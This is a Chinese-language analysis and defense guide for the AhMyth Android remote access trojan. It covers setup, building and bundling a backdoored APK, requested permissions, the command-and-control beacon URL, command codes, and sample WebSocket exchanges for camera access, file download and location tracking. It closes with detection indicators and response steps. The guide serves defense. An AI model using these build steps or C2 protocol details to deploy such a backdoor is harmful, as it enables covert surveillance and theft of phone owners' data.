AhMyth-Android-RAT远控功能及通信模型剖析
字数 2553 2025-08-24 23:51:09
AhMyth-Android-RAT远控工具深度分析与防御指南
1. AhMyth-Android-RAT概述
AhMyth-Android-RAT是一款开源的Android远程访问工具(RAT),首次发布于2017年7月8日,最后一次更新于2021年9月4日。该工具具有以下特点:
- 支持Windows和Linux多平台部署
- 采用WebSocket协议进行通信
- 提供图形化用户界面(GUI)操作
- 可生成APK后门或捆绑至第三方APK
- 在GitHub上获得4300+星标,1700+次fork
APT组织利用情况:
- 透明部落(Transparent Tribe)组织曾使用该工具针对印度军方进行攻击
- 奇安信病毒响应中心2024年报告证实了其在实际攻击中的应用
2. 环境搭建与使用
2.1 系统要求
-
控制端:
- Windows或Linux操作系统
- Java环境(推荐JDK 8u121版本)
-
受控端:
- Android设备或模拟器
2.2 安装步骤
-
Java环境配置:
# 下载并安装JDK 8u121 jdk-8u121-windows-i586.exe -
AhMyth工具下载:
- 从GitHub获取v1.0-beta.1版本
- 解压并运行主程序
2.3 生成恶意APK
- 启动AhMyth GUI界面
- 选择"APK Builder"菜单
- 配置以下参数:
- 监听IP地址(控制端IP)
- 监听端口(默认4242)
- 可选择捆绑至合法APK
- 点击"Build APK"生成恶意文件
3. 功能模块分析
3.1 Manifest文件分析
关键组件:
<activity android:name="ahmyth.mine.king.ahmyth.MainActivity"/>
申请的敏感权限包括:
android.permission.READ_SMSandroid.permission.SEND_SMSandroid.permission.READ_CONTACTSandroid.permission.CAMERAandroid.permission.RECORD_AUDIOandroid.permission.ACCESS_FINE_LOCATIONandroid.permission.READ_EXTERNAL_STORAGEandroid.permission.WRITE_EXTERNAL_STORAGE
3.2 核心功能模块
3.2.1 通信模块
- 外链地址:
"http://"+ip+":"+port+"?model="+Build.MODEL+"&manf="+Build.MANUFACTURER+"&release="+Build.VERSION.RELEASE+"&id="+android_id - 通信协议:WebSocket
3.2.2 远控指令集
| 指令代码 | 功能描述 | 对应管理器类 |
|---|---|---|
| x0000ca | 摄像头控制 | CameraManager |
| x0000cl | 通话记录获取 | CallsManager |
| x0000cn | 联系人获取 | ContactsManager |
| x0000fm | 文件管理 | FileManager |
| x0000lm | 位置追踪 | LocManager |
| x0000mc | 麦克风录音 | MicManager |
| x0000sm | 短信管理 | SMSManager |
3.3 各功能实现细节
3.3.1 摄像头控制(CameraManager)
- 获取设备摄像头列表
- 支持前后摄像头切换
- 实时传输摄像头画面
3.3.2 文件管理(FileManager)
- 浏览设备文件系统
- 文件上传/下载
- 目录遍历功能
- 支持路径操作(如
/sdcard/Download)
3.3.3 位置追踪(LocManager)
- 获取GPS坐标
- 返回格式:
{"enable":true, "lat":XXXXXXX, "lng":XXXXXXX}
3.3.4 麦克风录音(MicManager)
- 后台录音功能
- 音频数据实时传输
4. 通信模型分析
4.1 通信协议
- 基础协议:WebSocket
- 数据格式:JSON
- 加密情况:无加密,明文传输
4.2 通信流程
-
初始连接:
- 客户端通过HTTP GET请求建立连接
- 携带设备信息参数:
?model=[MODEL]&manf=[MANUFACTURER]&release=[VERSION]&id=[ANDROID_ID]
-
WebSocket握手:
- 升级协议至WebSocket
- 保持持久连接
-
指令传输:
- 控制端发送JSON格式指令
- 客户端返回执行结果
4.3 典型通信示例
4.3.1 摄像头控制
// 请求
42["order", {"order":"x0000ca", "extra":"camList"}]
// 响应
42["x0000ca", {"camList":true, "list":[{"name":"Back","id":0},{"name":"Front","id":1}]}]
4.3.2 文件管理
// 请求(列出目录)
42["order", {"order":"x0000fm", "extra":"ls", "path":"/sdcard/Download"}]
// 响应
42["x0000fm", [{"name":"../","isDir":true,"path":"/sdcard"},
{"name":"2075.jpg","isDir":false,"path":"/sdcard/Download/2075.jpg"}]]
// 请求(下载文件)
42["order", {"order":"x0000fm", "extra":"dl", "path":"/sdcard/Download/2075.jpg"}]
// 响应(文件内容)
451-["x0000fm", {"file":true, "name":"2075.jpg", "buffer":{"_placeholder":true,"num":0}}]
4.3.3 位置信息
// 请求
42["order", {"order":"x0000lm"}]
// 响应
42["x0000lm", {"enable":true, "lat":39.9042, "lng":116.4074}]
5. 检测与防御方案
5.1 检测指标(IOCs)
-
网络特征:
- WebSocket通信到非标准端口(默认4242)
- 特定URL参数格式
- 未加密的敏感数据传输
-
文件特征:
- 包含
ahmyth.mine.king.ahmyth包名 - 特定权限组合请求
- 存在CameraManager、FileManager等类
- 包含
5.2 防御措施
-
终端防护:
- 安装可信移动安全软件
- 定期检查应用权限设置
- 禁用未知来源应用安装
-
网络防护:
- 监控异常WebSocket连接
- 拦截到非标准端口的敏感数据传输
- 实施网络流量加密检测
-
企业防护:
- 部署移动设备管理(MDM)解决方案
- 实施应用白名单策略
- 员工安全意识培训
5.3 应急响应
-
感染处置:
- 立即断开网络连接
- 进入安全模式卸载可疑应用
- 恢复出厂设置(严重情况下)
-
取证分析:
- 检查
/data/data/[恶意包名]目录 - 分析网络连接日志
- 提取WebSocket通信记录
- 检查
6. 总结
AhMyth-Android-RAT作为一款开源远控工具,虽然已停止更新,但仍被APT组织利用进行实际攻击。其特点包括:
- 功能全面,覆盖常见监控需求
- 通信协议简单,易于分析
- 无加密措施,数据明文传输
- 可通过APK捆绑进行隐蔽传播
防御此类攻击需要结合技术手段和管理措施,特别应关注:
- 非标准端口WebSocket通信
- 异常权限组合请求
- 设备异常行为监控
通过全面了解其工作原理和实现细节,可以有效提升对此类威胁的检测和防御能力。